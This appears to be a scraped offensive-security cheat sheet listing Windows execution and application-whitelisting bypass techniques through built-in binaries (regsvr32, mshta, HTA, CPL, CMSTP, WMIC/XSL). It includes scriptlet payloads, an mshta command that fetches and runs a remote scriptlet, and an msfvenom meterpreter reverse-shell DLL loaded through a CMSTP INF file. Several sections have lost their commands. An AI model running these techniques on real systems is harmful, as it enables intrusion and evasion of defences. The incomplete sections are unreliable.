Windows Code Execution
regsvr32¶
m.sct
<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
    ]]>
</script>
</registration>
</scriptlet>
Execute
MSHTA¶
m.sct
<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    }
]]>
</script>
</scriptlet>
Execute
# from powershell
cmd /c start /b mshta.exe "javascript:a=(GetObject('script:http://ip/m.sct')).Exec();close();"
mshta.exe "javascript:a=(GetObject('script:http://ip/m.sct')).Exec();close();"
# from cmd
mshta.exe javascript:a=(GetObject('script:http://ip/m.sct')).Exec();close();
HTA¶
m.hta
<html>
<head>
<script language="VBScript"> 
    Sub RunProgram
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run "calc.exe"
    End Sub
RunProgram()
</script>
</head> 
<body>
    Nothing to see here..
</body>
</html>
Execute
Control Panel Item¶
The .cpl file needs to export a function CplApplet in order to be recognized by Windows as a Control Panel item.
Once the DLL is compiled and renamed to .CPL, it can simply be double clicked and executed like a regular Windows .exe file.
Once the DLL is compiled, use CFF Explorer to see the exported function Cplapplet
// Windows 10 Visual Studio 2022 Build
// dllmain.cpp : Defines the entry point for the DLL application.
// #include "stdafx.h"
#include "pch.h"
#include <Windows.h>
//Cplapplet
extern "C" __declspec(dllexport) LONG Cplapplet(
    HWND hwndCpl,
    UINT msg,
    LPARAM lParam1,
    LPARAM lParam2
)
{
    MessageBoxA(NULL, "Hey there, I am now your control panel item you know.", "Control Panel", 0);
    return 1;
}
BOOL APIENTRY DllMain( HMODULE hModule,
                      DWORD  ul_reason_for_call,
                      LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH:
            {
                Cplapplet(NULL, NULL, NULL, NULL);
            }
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
CMSTP¶
Generating the a reverse shell payload as a DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=8888 -f dll > /root/desktop/evil.dll
Creating a file that will be loaded by CSMTP.exe binary that will in turn load our evil.dll
f.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
path to\evil.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="cmstp"
ShortSvcName="cmstp"
Invoking the payload
Forfiles Indirect Command Execution¶
当前目录下,找到 evil.exe,就执行evil.exe
指定目录下,找到 evil.exe,就执行evil.exe
Application Whitelisting Bypass with WMIC and XSL¶
evil.xsl
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc");
    ]]> </ms:script>
</stylesheet>
Invoke any wmic command now and specify /format pointing to the evil.xsl
Powershell Without Powershell.exe¶
Github | PowerShdll¶
SyncAppvPublishingServer¶
# from PowerShell
SyncAppvPublishingServer.vbs break; [command]
SyncAppvPublishingServer.exe break; [command]